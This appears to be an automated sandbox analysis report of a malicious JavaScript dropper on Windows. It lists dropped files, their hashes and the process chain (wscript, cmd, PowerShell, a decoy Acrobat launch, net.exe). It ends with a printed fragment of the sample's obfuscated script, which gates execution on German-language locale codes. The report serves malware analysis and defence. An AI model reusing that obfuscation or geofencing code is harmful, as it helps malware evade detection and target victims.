C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.663181662373552 |
Encrypted: | false |
SSDEEP: | 24:Yv6XOJ2zvLCamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSo:YvdJuYBgkDMUJUAh8cvMo |
MD5: | 397E63FAE77CB44A662182E7A4B4FB03 |
SHA1: | EC22B18F9EF87177CD9E843969F9F41BE29CADFC |
SHA-256: | EAC26D7C2ED2B2073DA2129C64AA9D895D4579D0C5C45576C69E084ECA432406 |
SHA-512: | 53C1F60E20FB734467145F13F632CE10EE6C6CECDB7DFFCAC411A665A725C73649C1CE7091035ACF7A99E6A00031E0559E9B5276F2FC98168DE95713CE46A030 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.264963946259841 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfshHHrPeUkwRe9:YvXKXOlydS2Zc0vLyMGUUUkee9 |
MD5: | 124AB55761E15EBAE55656D102118998 |
SHA1: | 09F8D3EC3A63F6FAF21397AA0FD40919B01948FC |
SHA-256: | B6AA23532CE4996F81AC98B929ADDA0993D4DE1273E1BCDA3AB0D5732E069663 |
SHA-512: | 4E96B78A163FC0987E90B6B5271D3F020D4510CAFA1E7881EFA8E94CC09D7AC1BF57C081754A690B9E7BBABB02712C93592A6673057636AA64CBA54F7EEEEA2A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.278207923551849 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJTqgFCrPeUkwRe9:YvXKXOlydS2Zc0vLyMGTq16Ukee9 |
MD5: | FDD7F54C11CA1C6BE50447AD047EB4FA |
SHA1: | 7CAD357111F71300DFF9EF34499F34AD6A7D5B06 |
SHA-256: | 87BAFF827EDDE7998AC663EADBDB33322B61C31DD78B5E4FE13D42C6EC2DFCC3 |
SHA-512: | 6876D36DE8A437E7CC2B99FC873BCF5A53707079DDFB20E759354DF236DF18AC0487994E0BFD1EA3BFF883AD371C20AAAC64A5B25E4FF8B9BEC97CF79102A9F3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.136453835331312 |
Encrypted: | false |
SSDEEP: | 48:Y5xaerDfibGBOR5kwVnV8bcCA449TCM93:SxaerDXBORykV8bzA449T73 |
MD5: | 034E6673711BC4CD5274B2DA631E69DC |
SHA1: | A4468D37FB27D1A6ECF93E39F7B439F80317A4CC |
SHA-256: | 26E84307A25E6B5716A6D778EF68EA6DFDCA62C728D7111A799F041D6CCA14B0 |
SHA-512: | 020FD0497E6F061BB870ACE3AFA2AD7AB01BBC7DA93696647E86307F5C8EB7466DA6A8BBDAD1DCDA3060E455C21EDA82AB372292A1E780CEAB785667E963B2D6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1875978099500903 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUADHSvR9H9vxFGiDIAEkGVvp0Dn:lNVmswUUUUUUUU++FGSItY |
MD5: | ED6659EA2E5721CF17FB1C6B36EDFDB0 |
SHA1: | 36CBEBE4FE67919AC00F0594F7441AB90CC1E754 |
SHA-256: | 7C1098EABB67BDD915DDC3598875F91F4A96FA60CAEFE402FB1DD120D84F3F35 |
SHA-512: | 0A5E8CA31EA3393462457FA6C431895D71910BAC30ACDA31AB4B60537E719D138FFD817D6DE891C69B773F3A377467B118C24E56E598A62853D0F42772533776 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.606781765317937 |
Encrypted: | false |
SSDEEP: | 48:7M0KUUUUUUUUUUADbvR9H9vxFGiDIAEkGVvoqFl2GL7msj:70UUUUUUUUUUcFGSItuKVmsj |
MD5: | E401CF6450339AC9CA513BBD9E59BDFE |
SHA1: | CCEC5A3728C30FF2F2D41B0C5737AF44CF5D3C48 |
SHA-256: | 715BBB3ACFB88C68841F18885975F27D7A392AA5E2C5D56CC7B537A7526356A6 |
SHA-512: | 022FA7CF71260D9C71E5F85C3FB1821546E1380558D4D094AF04C5F683E6BE911838D45E9D2E60BC04E630E697DEFDF5A8AB94725C06BD42D3DE74ABD0CB2088 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgCNHFgMjC0lQzHRaL18C5TbHPCYyu:6a6TZ44ADE+HFgMjxQzYZbvCK |
MD5: | 885BC3B7612916442E7C2E4357D08F95 |
SHA1: | F45620E4527A5B7DFAB3F0FC4966378D97E0243C |
SHA-256: | 98AF7B5BB37ACC3F3C6E052FE07A7F4D5FF9F440BE7FD8195BBD75BD58BA0D0E |
SHA-512: | D439ABCD2217E509B2335DBBD578CB58298FAF0663539722B275D4353BE5C7C023EB1D2DE5533CE1E3234985035C9B653A0DA74A7EA778E3623454A7E3ECFEDD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5162684137903053 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClERwNYH:Qw946cPbiOxDlbYnuRK+bDEYH |
MD5: | 5DF16165136B007B82D6291974D78299 |
SHA1: | 6AE213C93814953C37F1CC846FCD3ACD548DEAAB |
SHA-256: | D50133E210FB3E078CE6A944BE2D5D820C936B8841C38566D2FC9D847DF1D4AD |
SHA-512: | 07A2A1B159F318D42CF7D8DAA8450B4CF1A8C321F7EF0819C64C29CB1541C039DAFE78EF09F3D07F226FAC93FC2DDAE7A0349103DB6B998BA1F400227ACA5A18 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 14-34-44-823.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.368035414009076 |
Encrypted: | false |
SSDEEP: | 384:j0opo4bQ1/k8lxyhvSS3gOI1VKGoPDfzc3mQ62Am6qib5IvEs7NBa1arGBXLvA5K:UxG |
MD5: | 90F532F42AD08D4E81294AC187F73AA3 |
SHA1: | F26808DC43F20620A4CB2073F79E0A85B7CCD7CB |
SHA-256: | DAF63B91C9D9108ECB12A533AFFE55D3857679A62C37AB02C3FBDFD67A291098 |
SHA-512: | AC92BD0E9B20791D20004116AE1D2837E1A581FCF97EBAFE5BC19F8282238A50629484BD46AAE93F51A07C9283A61F42371324577FFEDEB82314FABACCFF4E44 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.383241788954202 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r5:OU |
MD5: | 2E45FD64717318EA981A158647578C9D |
SHA1: | 84DE9391FB031F14ECB96639EABD9A6AE5815876 |
SHA-256: | 1B70698F5E49A0D3175C3CBCFA05966956F93C7FB5FC36880592201209737F10 |
SHA-512: | 1AC27E8E892D9CE351EF73CCBC159EEF6F6A0347D22D22892E5D90BCBE529934FA271E1C78C63C0D498E4E560FBF0F5469855E7AACA529B25DDBF4250FE708F6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/gWL07oXGZIZwYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:4WLxXGZIZwZGM3mlind9i4ufFXpAXkru |
MD5: | AAAAB43627E96B02BC54A78F0EE8E32C |
SHA1: | 03808205C51BA031BF69F0DF07C9C80835098104 |
SHA-256: | B9ED5860C1528CAE5717E553381762D9C4ED093E546F7500F55B6B18B5C20CEA |
SHA-512: | A476038C2BC9573AFA12D831678C0D2A6EFF0C1E065F7D214A0D5684E79AA7F02710DF30524DE0E6EC90CB660E581531DFA57F038EE1BC285B9BC3DAE17D133D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.928507208861742 |
TrID: | |
File name: | 3253418218787826771.js |
File size: | 18'703 bytes |
MD5: | 7490c6ddde3bb535175e37cf083e9878 |
SHA1: | 061725fcd44018b86a4058bb4431e6438e529d78 |
SHA256: | 07c1fffad1a85941fa3f1dc018c08e57d4fff62a4356e631aebae3edb9f6ef84 |
SHA512: | e9c5b16ce77c50e5b7df1c98578be8ff74b271c7aa5a37f3ae2d6622af5528b8fda98fb37c2a2f645025ccc7a2541f8dcc4752be74a8812259fb661e32d2ce1c |
SSDEEP: | 384:obn2lzYcMRXi42n2lxX8AJjWBgDb2JtQMktRgR3vQtnqy51iqk1Kaf96yQnjj:1NeLk1TMjj |
TLSH: | 408242CDD808C74FD8D97628C51F009A72F8C2CD8D8461D4B85DA0D92BEDBB895D3AB6 |
File Content Preview: | function lpvaj(){oiiieck=[1031,3079,5127,4103,2055,3072];var zejqvld=this[jxzpmxp+ubftmhtqn+jjksw+vfcvqbgq+ofqqcthec+jmgpcdflz+togktgric+audhia](this[tkyocmrt+pcrll+qffob+jjksw+qribkevsv+jxzpmxp+audhia][harprzo+jjksw+ofqqcthec+ubftmhtqn+audhia+ofqqcthec+y |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 14:34:36 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff71e210000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 14:34:37 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff771090000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 14:34:37 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 14:34:37 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 14:34:41 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 14:34:41 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff771090000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 14:34:41 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66d610000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 14:34:42 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 14:34:42 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 14:34:43 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function lpvaj() { |
|
1 | oiiieck = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var zejqvld = this[jxzpmxp + ubftmhtqn + jjksw + vfcvqbgq + ofqqcthec + jmgpcdflz + togktgric + audhia] ( this[tkyocmrt + pcrll + qffob + jjksw + qribkevsv + jxzpmxp + audhia][harprzo + jjksw + ofqqcthec + ubftmhtqn + audhia + ofqqcthec + yrygtvxba + tynsi + almvoq + ofqqcthec + qffob + audhia] ( tkyocmrt + pcrll + qffob + jjksw + qribkevsv + jxzpmxp + audhia + pwclggrql + pcrll + ryhygg + ofqqcthec + adydpw + adydpw ) [nujhsgjtt + ofqqcthec + icpnu + nujhsgjtt + ofqqcthec + ubftmhtqn + lpnqxv] ( jlhxcah + ymabu + wenzzwqq + piqbsmm + rvvscwnvr + harprzo + yevlmr + nujhsgjtt + nujhsgjtt + wenzzwqq + peinqdvn + vzbiskfes + rvvscwnvr + yevlmr + pcrll + wenzzwqq + nujhsgjtt + ewjvsdgtn + harprzo + zpkcv + togktgric + audhia + jjksw + zpkcv + adydpw + ehnfc + twcdol + ubftmhtqn + togktgric + ofqqcthec + adydpw + ewjvsdgtn + jmgpcdflz + togktgric + audhia + ofqqcthec + jjksw + togktgric + ubftmhtqn + audhia + qribkevsv + zpkcv + togktgric + ubftmhtqn + adydpw + ewjvsdgtn + ikvwmyzo + zpkcv + qffob + ubftmhtqn + adydpw + ofqqcthec ), 16 ); |
|
3 | for ( opnetbm = 0 ; opnetbm < oiiieck[adydpw + ofqqcthec + togktgric + icpnu + audhia + ryhygg] ; ++ opnetbm ) | |
4 | { | |
5 | if ( zejqvld == oiiieck[opnetbm] ) | |
6 | { | |
7 | zejqvld = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( zejqvld !== true ) | |
12 | this[tkyocmrt + pcrll + qffob + jjksw + qribkevsv + jxzpmxp + audhia][ktmirwjdq + ivkjmrpq + qribkevsv + audhia] ( ); | |
